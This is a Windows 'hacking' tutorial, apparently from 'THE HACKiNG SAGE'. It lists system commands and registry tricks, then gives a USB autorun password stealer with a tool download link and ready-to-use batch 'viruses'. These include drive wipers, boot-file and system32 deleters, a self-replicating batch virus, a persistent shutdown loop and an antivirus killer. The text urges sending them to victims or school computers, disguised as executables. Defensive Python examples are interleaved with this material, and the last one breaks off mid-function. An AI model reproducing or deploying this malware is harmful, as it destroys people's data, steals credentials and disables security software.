WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
Some Important DOS Commands :
Accessibility Controls = access.cpl
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Automatic Updates = wuaucpl.cpl
Bluetooth Transfer Wizard = fsquirt
Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel (If Installed)* = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Management = diskmgmt.msc
Disk Partition Manager = diskpart
Display Properties = control desktop/desk.cpl
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility = verifier
Event Viewer = eventvwr.msc
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Folders Properties = control folders
Fonts = control fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
Group Policy Editor (XP Prof) = gpedit.msc
Hearts Card Game = mshearts
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig
Java Control Panel (If Installed) = jpicpl32.cpl
Java Application Cache Viewer (If Installed) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff
Microsoft Chat = winchat
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager (If Installed) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter (If Installed) = ac3filter.cpl
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder = printers
Private Character Editor = eudcedit
Quicktime (If Installed) = QuickTime.cpl
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedt32
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy (XP Prof) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks = control schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Shuts Down Windows = shutdown
Sounds and Audio = mmsys.cpl
Spider Solitaire Card Game = spider
SQL Client Configuration = cliconfg
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Properties = sysdm.cpl
Task Manager = taskmgr
Telnet Client = telnet
User Account Management = nusrmgr.cpl
Utility Manager = utilman
Windows Firewall = firewall.cpl
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows System Security Tool = syskey
Windows Update Launches = wupdmgr
Windows XP Tour Wizard = tourstart
Wordpad = write
This list is not exhaustive. Most commands will work well; however, some of these might
not work on your machine due to version dependencies..
...
4. Registry & Group Policy Editor In Windows
In the Windows OS, the Registry is the operating system's database, where all of its
settings are saved. We can change any system setting using the Registry or the
Group Policy Editor.
Hide All Local Drives Using Registry
RUN > regedit |or| CMD > regedit
1. Open Registry
2. Hkey_Current_User
3. Software
4. Microsoft
5. Windows
6. Current Version
7. Policies
8. Explorer
Here You Have To Give A New Instruction To The Computer. We Do This By Making A
New DWORD
1. Right Click On Window
2. New
3. Dword
Now The Name Of This Dword Will Be The Same As The Instruction
4. Rename As Nodrives
Now We Have To Start The Instruction. To Do This, We Will Give The Enable Value To The
DWord
5. Right Click On Nodrives Dword
6. Modify
7. Insert Enable Value: 3ffffff [Decimal Value - 67108863]
Whenever You Have To Stop The Instruction, You Will Have To Insert The Disable Value
Disable Value For Nodrives : 0
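The enable value 3ffffff is a bitmask: NoDrives uses one bit per drive letter, bit 0 for A: up to bit 25 for Z:, so all 26 bits set gives 3ffffff (67108863). The Python below is an added example, not code from the book, with function names of my own choosing; it decodes a NoDrives value found in a .reg export or in reg query output (the sample text is constructed) and builds the mask for a chosen set of letters.

```python
import re

LETTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"     # bit 0 -> A: ... bit 25 -> Z:
ALL_DRIVES = (1 << len(LETTERS)) - 1       # 0x3FFFFFF == 67108863

# Two text forms an auditor meets: a .reg export line and `reg query` output.
_PATTERNS = (
    re.compile(r'"NoDrives"\s*=\s*dword:([0-9a-f]{1,8})', re.I),
    re.compile(r'\bNoDrives\s+REG_DWORD\s+0x([0-9a-f]{1,8})', re.I),
)


def decode_nodrives(value):
    """Return the drive letters hidden by a NoDrives DWORD value."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("NoDrives is a 32-bit DWORD")
    return [LETTERS[i] for i in range(len(LETTERS)) if (value >> i) & 1]


def encode_nodrives(letters):
    """Build the NoDrives mask that hides exactly the given drive letters."""
    mask = 0
    for letter in letters:
        letter = letter.upper().rstrip(":")
        if len(letter) != 1 or letter not in LETTERS:
            raise ValueError(f"not a drive letter: {letter!r}")
        mask |= 1 << LETTERS.index(letter)
    return mask


def find_nodrives(text):
    """Extract the NoDrives value from exported registry text, or None."""
    for pattern in _PATTERNS:
        match = pattern.search(text)
        if match:
            return int(match.group(1), 16)
    return None


# Constructed sample of `reg query` output for the key named in the steps above.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoDrives    REG_DWORD    0x3ffffff
"""

if __name__ == "__main__":
    value = find_nodrives(SAMPLE_REG_QUERY)
    print(hex(value), "hides", "".join(decode_nodrives(value)))
    print("mask for D: and E: only =", encode_nodrives(["D", "E"]))
```

A value of 0, or a missing NoDrives entry, decodes to an empty list, which is the state the disable value restores.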
Shut Down PC Using Shutdown Virus & Group Policy Editor
RUN > gpedit.msc |or| CMD > gpedit.msc
First We Build A Shutdown Virus :
1. Open Notepad
2. Write Syntax : Shutdown s t 30
3. Save This File As anyname.bat
4. Go To File's Property & Copy Location Of File
Now,
1. Open Group Policy Editor
2. User Configuration
3. Administrative Templates
4. System
5. Log On
6. Run This Program At User Log On
7. Enable
8. Show
9. Paste The Copied Location And Add File Name
10. Done..
11. Restart Computer System.
Now When Ever You Start Your PC It Will Auto ShutDown In 30 Sec..
How To Stop Shutdown Process? :
Temporary Solution : When You Start Your PC, Type "shutdown -a" In RUN Within 30
Sec. It Will Stop The Shutdown Process..
Permanent Solution : Open System In Safe Mode & Remove File From Group Policy
Editor..
...
5. Windows Tricks & Hacks
Internet Protection & Privacy :
As We Know, Sometimes We Want To Lock Some Websites For Security Reasons Or For
The Privacy Of Our Company. There Are Also Many Websites That Are Restricted By
The Government, And We Need To Lock Those Sites.
In Windows..
1. Go To System Drive (C:/)
2. Go To Windows
3. Go To System32
4. Go To Drivers
5. Go To Etc
6. Now Select Hosts File
7. Open Hosts File In Notepad
8. Write Syntax:
127.0.0.1 www.hostname.domain
At The End Of The File
(ex. 127.0.0.1 www.facebook.com)
9. Save File (CTRL+S)
Now This Site Is Locked & You Can't Access It. If You Want To Allow This Site
(Facebook) To Be Opened Again, Remove That Last Line To Unlock The Website.
Hide A File Behind An Image
Hiding a file behind an image file means that anyone who opens the image will see
only the image, but if you open it in a special way you can open the hidden file
behind the image.
To hide the file behind an image, open CMD.exe.
1. Select an image to be used for hiding the file.
2. Now select a file to hide behind the image and put it in .RAR format with the
help of WinRAR.
3. Most important: paste both files on the desktop.
4. Then type the following commands in the command prompt.
cd desktop
copy /b imagename.jpg+filename.rar finalnameofimage.jpg
Then hit Enter; the file will be created with the final file name of the image.
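From the examiner's side, a file built with copy /b is an image followed by extra bytes: image viewers stop at the JPEG end-of-image marker, so whatever follows it is what needs explaining. The Python below is an added example, not code from the book; its function names and the tiny sample file are constructed for illustration. It walks the JPEG segment by segment rather than searching for the first FF D9, because embedded thumbnails carry their own end marker.

```python
import struct

# Signatures of common archive formats that may follow the image data.
ARCHIVE_MAGICS = {
    b"Rar!\x1a\x07": "RAR",
    b"PK\x03\x04": "ZIP",
    b"7z\xbc\xaf\x27\x1c": "7-Zip",
}
STANDALONE = {0x01} | set(range(0xD0, 0xD8))   # TEM and RST0-RST7 have no length


def _skip_scan(data, pos):
    """Advance past entropy-coded scan data to the next real marker."""
    while True:
        pos = data.find(b"\xff", pos)
        if pos == -1 or pos + 1 >= len(data):
            raise ValueError("truncated JPEG (scan data never ends)")
        nxt = data[pos + 1]
        if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:   # stuffed FF or restart marker
            pos += 2
        elif nxt == 0xFF:                        # fill byte
            pos += 1
        else:
            return pos


def jpeg_end_offset(data):
    """Return the offset just past the real end-of-image (EOI) marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                       # fill byte before a marker
            pos += 1
        elif marker == 0xD9:                     # EOI: the image ends here
            return pos + 2
        elif marker in STANDALONE:
            pos += 2
        else:
            if pos + 4 > len(data):
                break
            (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
            if length < 2:
                raise ValueError(f"bad segment length at offset {pos}")
            pos += 2 + length                    # skip the whole segment
            if marker == 0xDA:                   # SOS: scan data follows header
                pos = _skip_scan(data, pos)
    raise ValueError("truncated JPEG (no EOI marker)")


def inspect_jpeg(data):
    """Report how many bytes follow the image and whether they hold an archive."""
    end = jpeg_end_offset(data)
    trailer = data[end:]
    kind = next((name for magic, name in ARCHIVE_MAGICS.items()
                 if magic in trailer), None)
    return {"image_bytes": end, "trailing_bytes": len(trailer), "archive": kind}


def build_sample():
    """Constructed bytes: a structurally valid (not viewable) JPEG, then a RAR header."""
    thumb = b"\xff\xd8\xff\xd9"                  # fake thumbnail inside APP1
    app1 = b"\xff\xe1" + struct.pack(">H", 2 + len(thumb)) + thumb
    sos = b"\xff\xda" + struct.pack(">H", 3) + b"\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"       # includes stuffing and RST0
    image = b"\xff\xd8" + app1 + sos + scan + b"\xff\xd9"
    return image, image + b"Rar!\x1a\x07\x00" + b"constructed payload"


if __name__ == "__main__":
    clean, combined = build_sample()
    print(inspect_jpeg(clean))
    print(inspect_jpeg(combined))
```

Any non-zero trailing_bytes on an image is worth a look even when no archive signature matches, since the appended data may be in another format.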
Make A Private Folder
To make a private folder which nobody can open, delete, rename or see the properties
of, first make a folder on the desktop. Rename it to whatever you want.
Then open the command prompt and type the following commands.
cd desktop
cacls folder /e /p everyone:n
Hit Enter and the folder is locked.
To open the folder, run the same command with :n replaced by :f
And the folder is opened..
Done!!!
Make A Private Folder With Your Password
First, open Notepad and type the following syntax into it.
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo -----------------------------------------------------------
echo ================== THE HACKiNG SAGE ==================
echo -----------------------------------------------------------
echo Are you sure you want to lock the folder(Y/N)
echo Press (Y) for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo -----------------------------------------------------------
echo ================== THE HACKiNG SAGE ==================
echo -----------------------------------------------------------
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%==YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDENTER PASSWORD TO OPEN
md Private
echo Private created successfully
goto End
:End
Now change the password: in the line if NOT %pass%==YOUR PASSWORD goto FAIL,
replace the text YOUR PASSWORD with your password for the folder lock.
Now save this file as Locker.bat and you are done.
Now Open the Locker.bat file and enter your password to open a private folder
of yours.
Now copy paste the files which you want to hide and make it secure in the
private folder.
Now again open the Locker.bat file and press 'Y' to lock the private folder with
your password.
Now to again open the secured files open the locker.bat file Enter your
password and your files are there for you.
NOTE : You can use bat to exe converter and can convert it into .exe file to safeguard
the code above.
Hack Passwords Using Pendrive (USB Stealer)
We all know, Windows stores most of the passwords which are used on a daily basis,
including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger
etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There
exist many tools for recovering these passwords from their stored places. Using these
tools and a USB pen-drive, you can create your own rootkit to steal passwords from any
computer. You need to follow these steps to make your own password stealing rootkits.
You must temporarily disable the antivirus before following these steps.
1. Download the set of tools, extract them and copy all files (.exe) into your USB
Pendrive.
Download Password Stealer From Here :
http://www86.zippyshare.com/v/Dy3oseUc/file.html
2. Create a new Notepad and write the following text into it.
[autorun] open=launch.bat
ACTION= Perform a Virus Scan
3. Save the Notepad and rename it from New Text Document.txt to autorun.inf
4. Copy the autorun.inf file onto your USB pen-drive.
5. Create another Notepad and write the following text in it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the
launch.bat file to your USB drive.
Now our rootkit is ready and we are all set to sniff the passwords. You can use this
pen-drive on any computer to steal the stored passwords.
Now, Insert the pen-drive and the auto-run window will pop-up. (This is because, we
have created an auto-run pen-drive). In the pop-up window, select the first option
(Perform a Virus Scan). Now all the password recovery tools will silently get executed
in the background (This process takes hardly a few seconds). The passwords get stored
in the .TXT files. Remove the pen-drive and you’ll see the stored passwords in the .TXT
files and Use The Passwords..
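The drive described above depends on an autorun.inf that pairs a launch command with a reassuring ACTION label, and that pairing is something a defender can check for before a removable drive is trusted. The Python below is an added example, not code from the book; the function names and the sample file are constructed. It parses the [autorun] section and reports every key that makes Windows run something, plus the label shown to the user.

```python
import re

# Keys in the [autorun] section that cause a program to be started.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
RISKY_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".exe", ".com", ".scr")
FIRST_TOKEN = re.compile(r'"([^"]+)"|(\S+)')     # first word, honouring quotes


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):     # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def audit_autorun(text):
    """List (finding, key, value, detail) tuples for an autorun.inf body."""
    entries = parse_autorun(text)
    findings = []
    for key, value in entries.items():
        if not EXEC_KEY.match(key):
            continue
        match = FIRST_TOKEN.match(value)
        target = (match.group(1) or match.group(2)).lower() if match else ""
        detail = "script-or-binary" if target.endswith(RISKY_EXT) else "command"
        findings.append(("executes", key, value, detail))
    # A custom label only matters when it fronts something that executes.
    if findings and "action" in entries:
        findings.append(("autoplay-label", "action", entries["action"],
                         "text shown to the user"))
    return findings


# Constructed sample modelled on the file described in the steps above.
SAMPLE = """[AutoRun]
; constructed sample, not taken from a real drive
open=launch.bat
ACTION= Perform a Virus Scan
icon=drive.ico
"""

BENIGN = """[autorun]
icon=setup.ico
label=Backup
"""

if __name__ == "__main__":
    for finding in audit_autorun(SAMPLE):
        print(finding)
    print("benign file findings:", audit_autorun(BENIGN))
```

Setting the NoDriveTypeAutoRun policy value to 0xFF disables AutoRun for every drive type, which closes this entry point regardless of what the file contains.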
Create Dangerous Virus Using Notepad
In this article we will learn how to create simple but dangerous viruses using notepad.
These are very simple to create and use, but don’t dare to use these on your computer
because these viruses can destroy your personal information. Where to use? You can
send these viruses to your enemies or if you wanna try it yourself best and my favorite
place is school computers.
Let’s get started..
1. Open notepad ( run > notepad )
2. Put the syntax provided
3. Save it in the correct extension.. for this replace .txt correct extension like
.bat/.vbs
4. Done !!!
1. RAM Crash Virus :
:thehackingsage
explorer.exe
goto thehackingsage
Save File As ramcrash.bat
2. Wiper :
Deletes everything in the computer’s drive.
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save As wiper.bat
3. Registry Deleter :
Deletes everything stored in registry.
@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Save As registrydeleter.bat
4. No Access :
A good Halloween prank for your friends this stops internet access of the user.
@echo off
ipconfig /release
Save As noaccess.bat
To gain Access type IPconfig /renew in CMD
5. Shut Up :
Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” –s
Save As shutup.bat
6. Crash Puter :
This is simple virus that crashes the computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
Save As crashputer.vbs
7. Ez Formatter :
This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C
drives.
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
Save As ezformatter.bat
8. Shutter :
This virus can be very annoying it shutdowns computer every time the computer is
turned on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t
reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
Save As shutter.bat
9. Rest In Peace :
It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for
starting up windows.
Do not use on yourself .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save As RIP.bat
10. Century :
Shut downs the PC hundred times. You can also change the times pc restarts by
replacing 100 by your choice.
shutdown -s -t 100 c “Installing Updates”
Save As shutdowncentury.bat
To Stop type shutdown -a in Run
11. RIP v2.0 :
This virus does the same It also prevents pc from starting but in an effective and better
way.
del c:\WINDOWS\system32\*.*/q
Save As RIP2.bat
12. Freak :
This virus disables the internet forever
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v
CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime
PAUSE
Save As freak.bat
13. CMD Matrix :
Don’t think i am telling you about simple matrix falling effect of notepad. When you run
it, it makes matrix out of the batch file. Don’t run it on your pc
// THE HACKiNG SAGE
// http://www.thehackingsagerises.blogspot.com
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat”, ios::app);
fp << “@ECHO OFF n”;
fp << “START C:\rawr.exe n”;
fp << “EXIT”;
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]=”C:\rawr.exe”;
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp(“CLICK.bat”, ios::app);
fp << “@ECHO OFF n”;
fp << “COPY matrix.exe C:\rawr.exe n”;
fp << “START C:\rawr.exe n”;
fp << “EXIT”;
}
system(“START CLICK.bat”);
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system(“call shutdown.exe -S”);
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |
FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << “0%”;
cout << setw(4) << “P”;
cout << setw(4) << ” “;
cout << setw(4) << “)”;
cout << setw(4) << “#”;
cout << setw(4) << “X”;
cout << setw(4) << “@”;
cout << setw(4) << “1&”;
cout << setw(4) << “*”;
cout << setw(4) << “||”;
cout << setw(4) << ” “;
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
Save As cmdmatrix.bat
14. Danger X
I ain’t gonna tell anything about this one find it yourself.. Don’t test it on your PC.
@echo off>nul.ViRuS
if ?%1==?/ViRuS_MULTIPLY goto ViRuS_multiply
if ?%1==?/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if ?%1==?/ViRuS_FINDSELF goto ViRuS_findself
if ?%VOFF%==?T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if ?%ViRuSname%==? goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it?s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /xn path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT
:ViRuS_findself
if ?%2==? goto XXX_END>nul.ViRuS
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself
:ViRuS_outer_loop
for %%a in (%2*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
:ViRuS_multiply
find ?ViRuS? <%ViRuSname%.bat >xViRuSx.bat
find /v ?ViRuS? <%2 |find /v ?:XXX_END? >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
:ViRuS_OLDBAT
echo on>nul.ViRuS
echo Exclusive THE HACKiNG SAGE
:XXX_END
Save As dangerX.bat
15. Antivirus Ripper :
You can guess what it does by its name .
@ echo off
rem
rem RIP Anti Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files
ood32krn\*.exe
del /Q /F C:\Program Files
ood32\*.exe
cls
del /Q /F C:\Program Files
od32
del /Q /F C:\Program Files
ood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem
Save As antivirusripper.bat
This is not compatible with every single antivirus but with famous antivirus.
Done !!!!
WARNING : This Is Only for Educational Purpose, Please Don’t Misuse..
Now, there are some smart guys who check the batch files in notepad before running it.
No big deal. An effective way .
How to make those stuff work ? Well... Download bat to exe Converter :
http://www100.zippyshare.com/v/RsogwyWd/file.html
1. Download and run the converter.
2. Inject your batch file
3. Choose icon
4. Version and information
5. Compile
6. Send to your victim..
WARNING : All These Batch File Viruses Are So Dangerous So Please Don’t
Misuse..
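Seen from the defender's side, the batch file above is a burst of process-kill commands and forced deletes under Program Files, all issued by one parent process within seconds. The detection sketch below is an added example, not part of the original book; the log records, host names, window and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records: (timestamp, host, parent process, command line).
SAMPLE_EVENTS = [
    ("2016-05-01T10:00:00", "WS-01", "cmd.exe", "tskill /A msmp*"),
    ("2016-05-01T10:00:01", "WS-01", "cmd.exe", "tskill /A mcafe*"),
    ("2016-05-01T10:00:01", "WS-01", "cmd.exe", "tskill /A norton*"),
    ("2016-05-01T10:00:02", "WS-01", "cmd.exe", r"del /Q /F C:\Program Files\Mcafee\*.*"),
    ("2016-05-01T10:00:03", "WS-01", "cmd.exe", r"del /Q /F C:\Program Files\kaspersky\*.*"),
    ("2016-05-01T11:30:00", "WS-02", "explorer.exe", "tskill /A notepad"),
    ("2016-05-01T11:45:00", "WS-02", "cmd.exe", r"del /Q /F C:\Temp\build\*.obj"),
]

# A process-kill utility invoked from the command line.
KILL_RE = re.compile(r"^\s*(?:tskill|taskkill)(?:\.exe)?\b", re.I)
# A quiet or forced delete whose target lies under Program Files.
DEL_RE = re.compile(r"^\s*(?:del|erase)\b(?=.*\s/[fq]\b)(?=.*\\program files\\)", re.I)


def classify(cmdline):
    """Return the tamper category of a command line, or None if it is unremarkable."""
    if KILL_RE.search(cmdline):
        return "process-kill"
    if DEL_RE.search(cmdline):
        return "program-files-delete"
    return None


def find_tamper_bursts(events, window=timedelta(seconds=60), threshold=3):
    """Flag (host, parent) pairs that issue `threshold` or more tamper commands within `window`."""
    by_source = defaultdict(list)
    for ts, host, parent, cmd in events:
        kind = classify(cmd)
        if kind:
            by_source[(host, parent)].append((datetime.fromisoformat(ts), kind))

    alerts = []
    for (host, parent), hits in by_source.items():
        hits.sort(key=lambda h: h[0])
        best_size, best_start, start = 0, 0, 0
        for end in range(len(hits)):
            # Slide the window start forward until the span fits inside `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if end - start + 1 > best_size:
                best_size, best_start = end - start + 1, start
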